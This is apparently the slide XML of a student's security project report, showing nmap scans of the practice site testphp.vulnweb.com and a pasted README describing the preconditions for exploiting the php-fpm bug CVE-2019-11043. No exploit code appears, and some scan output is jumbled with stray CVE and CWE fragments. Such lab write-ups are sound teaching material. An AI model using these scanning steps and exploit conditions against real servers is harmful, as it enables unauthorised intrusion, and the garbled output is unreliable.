          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2679700" y="474345"/>
            <a:ext cx="7391400" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                                               DAY -4</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                              Exploitation of vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1422401" y="3117019"/>
            <a:ext cx="9905998" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Step -1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>testphp.vulnweb.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Step-2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>In terminal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> testphp.vulnweb.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Starting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> 7.94 ( https//nmap.org ) at 2023-07-14 13:50 IST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> scan report for testphp.vulnweb.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>(44.228.249.3)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Host is up (0.28s latency).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>CVSSV3.1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>rDNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> record for 44.228.249.3: ec2-44-228-249-3.us-west-2.compute.amazonaws.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Not shown: 999 filtered </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> ports (no-response) CVE-ID: CVE-2022-417</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="380030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4FB6AEF-1EE4-4FCA-A8BB-9F848DA9940E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1930400" y="425946"/>
            <a:ext cx="8385577" cy="6247864"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>PORT STATE SERVICE</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>CWE-ID: CWE-125-Ouch</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>80/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> open http</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Exploit availability: No</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> done: 1 IP address (1 host up) scanned in 21.04 seconds </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Step -3</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Take </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> address of domain and </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> 44.228.249.3 -p 80</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>nginx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> 1.0.7-1.23.1</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> 44.228.249.3 -p 80</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Starting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> 7.94 (https://nmap.org) at 2023-07-14 13:51 IST</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>ec2-44-228-249-3.us-west-2.compute.amazonaws.com (44.228.249.3)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> scan report for</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Host is up (0.30s latency).</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>PORT STATE SERVICE VERSION</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>80/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> open http </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>nginx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> 1.19.0</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>che</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> 2.3 an</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>External links</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Service detection performed. Please report any incorrect results at https://nmap.org/submit/</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10478794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465AEBD-437E-4335-8CEB-69AC9ECF2481}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1587500" y="556548"/>
            <a:ext cx="8150225" cy="5632311"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Nmap done: 1 IP address (1 host up) scanned in 23.10 seconds </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Step -4 </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Copied the version   </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>nginx 1.19.0 and </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Pasted it in google  </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>The results is </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t># PHuiP-FPizdaM</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>## What's this</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>This is an exploit for a bug in php-fpm (CVE-2019-11043). In certain nginx + php-fpm configurations, the bug is possible to trigger from the outside. This means that a web user may get code execution if you have vulnerable config (see [below](#the-full-list-of-preconditions)).</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>## What's vulnerable</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>If a webserver runs nginx + php-fpm and nginx have a configuration like</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>location ~ [^/]\.php(/|$) {</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>  ...</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>  fastcgi_split_path_info ^(.+?\.php)(/.*)$;</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>  fastcgi_param PATH_INFO       $fastcgi_path_info;</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28901434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xmlns=""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a:off x="16667" y="5339"/>
            <a:ext cx="12192000" cy="6847320"/>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4762" y="43843"/>
            <a:ext cx="12182473" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>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4767" y="1583894"/>
            <a:ext cx="12192003" cy="5274105"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="TextBox 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{767876FE-DCBC-47B7-A3E0-7BA16FBE8BB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1990725" y="1362030"/>
            <a:ext cx="9223813" cy="3477875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Report on project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>LALAM AADHI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Regd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> No</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>:- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>720139005008</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>SRI BALAJI DEGREE COLLEGE – 30252</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Pendurthi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>, Visakhapatnam</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10948493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CAEE8C1-324E-4A2D-A565-418800D517AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="635001" y="1125291"/>
            <a:ext cx="11556999" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>fastcgi_pass   php:9000;</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>  ...</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>}which also lacks any script existence checks (like try_files), then you can probably hack it with this sploit.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>#### The full list of preconditions</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>1. Nginx + php-fpm, location ~ [^/]\.php(/|$) must be forwarded to php-fpm (maybe the regexp can be stricter, see [#1](https://github.com/neex/phuip-fpizdam/issues/1)).</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>2. The fastcgi_split_path_info directive must be there and contain a regexp starting with ^ and ending with $, so we can break it with a newline character.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>3. There must be a PATH_INFO variable assignment via statement fastcgi_param PATH_INFO $fastcgi_path_info;. At first, we thought it is always present in the fastcgi_params file, but it's not true.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>4. No file existence checks like try_files $uri =404 or if (-f $uri). If Nginx drops requests to non-existing scripts before FastCGI forwarding, our requests never reach php-fpm. Adding this is also the easiest way to patch.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>5. This exploit works only for PHP 7+, but the bug itself is present in earlier versions (see [below](#about-php5)).</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>## Isn't this known to be vulnerable for years?</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>A long time ago php-fpm didn't restrict the extensions of the scripts, meaning that something like /avatar.png/some-fake-shit.php could execute avatar.png as a PHP script. This issue was fixed around 2010.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25712054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5CBB7B8-F11F-4CDF-9795-16A0DE26AE3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1777285" y="876569"/>
            <a:ext cx="8145932" cy="5355312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
